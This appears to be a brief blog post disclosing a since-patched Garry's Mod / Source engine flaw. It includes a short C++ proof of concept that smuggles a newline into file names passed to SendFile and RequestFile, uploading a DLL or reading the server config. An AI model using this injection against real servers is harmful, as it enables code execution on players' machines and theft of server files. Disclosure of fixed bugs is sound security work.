engine_win32.dll

There’s been a fair bit of drama today over an exploit in Garry’s Mod which allowed a DLL to be uploaded and run on servers, which would in turn run it on all clients connected to the server.

Basically the exploit boils down to a flaw in some internal Source engine networking code not properly sanitizing file names.

1
2
3
4
5
6
7
8
9
10
CreateInterfaceFn engineFactory = Sys_GetFactory("engine.dll");
IVEngineClient* client = static_cast<IVEngineClient*>(engineFactory(VENGINE_CLIENT_INTERFACE_VERSION, NULL));

INetChannel* info = static_cast<INetChannel*>(client->GetNetChannelInfo());

// Send any file
info->SendFile("engine_win32.dll\n.txt");

// Receive any file
info->RequestFile("cfg/server.cfg\n.txt");

It’s fixed now though, so no need to worry!